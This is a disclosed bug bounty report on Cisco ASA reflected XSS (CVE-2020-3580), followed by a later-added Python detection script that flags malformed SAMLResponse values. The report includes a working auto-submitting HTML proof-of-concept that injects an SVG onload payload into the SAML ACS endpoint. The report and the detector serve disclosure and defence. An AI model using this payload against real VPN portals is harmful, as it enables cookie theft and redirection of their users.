XSS DUE TO CVE-2020-3580

Disclosed: 2022-09-06 18:55:29 By cruxn3t To deptofdefense
Medium
Vulnerability Details
Hello Team,

During my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580. This vulnerability targets the SAML service within the VPN. It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a

## References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe

## Impact

With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.

## System Host(s)

█████

## Affected Product(s) and Version(s)

Cisco ASA

## CVE Numbers

CVE-2020-3580

## Steps to Reproduce

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://████/+CSCOE+/saml/sp/acs?tgname=a" method="POST">
      <input type="hidden" name="SAMLResponse" value="&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS&apos;&#41;&gt;" />
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

## Suggested Mitigation/Remediation Actions

Patch Cisco ASA: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe
Report Stats
  • Report ID: 1606068
  • State: Closed
  • Substate: resolved
  • Upvotes: 2
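
A detection check for the request shape described in the report, added here as an example and not part of the original report or any Cisco tooling. In the SAML HTTP POST binding a legitimate `SAMLResponse` is base64-encoded XML, so a POST to the ACS endpoint whose value fails that test is worth an alert. The record layout (a proxy or WAF log that captures request bodies), the host `vpn.example.test`, and all function names are assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

ACS_PATH = "/+CSCOE+/saml/sp/acs"  # endpoint named in the report


def classify_saml_response(value):
    """Return 'ok' or the reason the value cannot be a SAML POST-binding message."""
    if not value:
        return "missing SAMLResponse"
    compact = value.replace("\r", "").replace("\n", "")
    try:
        decoded = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return "not base64"
    if not decoded.lstrip().startswith(b"<"):
        return "decoded value is not XML"
    return "ok"


def inspect_request(method, url, body):
    """Return None for out-of-scope requests, else the classification."""
    if method.upper() != "POST" or unquote(urlsplit(url).path) != ACS_PATH:
        return None
    form = parse_qs(body, keep_blank_values=True)
    return classify_saml_response(form.get("SAMLResponse", [""])[0])


def flag_records(records):
    """Return (url, reason) for in-scope records whose SAMLResponse is malformed."""
    return [(r["url"], reason) for r in records
            if (reason := inspect_request(r["method"], r["url"], r["body"]))
            not in (None, "ok")]


# Constructed sample records (placeholder host, harmless markup marker).
URL = "https://vpn.example.test/+CSCOE+/saml/sp/acs?tgname=a"
GOOD = base64.b64encode(b'<samlp:Response ID="_constructed"/>').decode()
SAMPLE = [
    {"method": "POST", "url": URL, "body": urlencode({"SAMLResponse": GOOD})},
    {"method": "POST", "url": URL,
     "body": urlencode({"SAMLResponse": '"><i>constructed-marker</i>'})},
    {"method": "POST", "url": URL,
     "body": urlencode({"SAMLResponse": base64.b64encode(b"hello").decode()})},
    {"method": "GET", "url": URL, "body": ""},
]

if __name__ == "__main__":
    for url, reason in flag_records(SAMPLE):
        print(f"ALERT {url}: {reason}")
```

This check covers the interval before the device is updated; the fix remains the Cisco patch linked in the report.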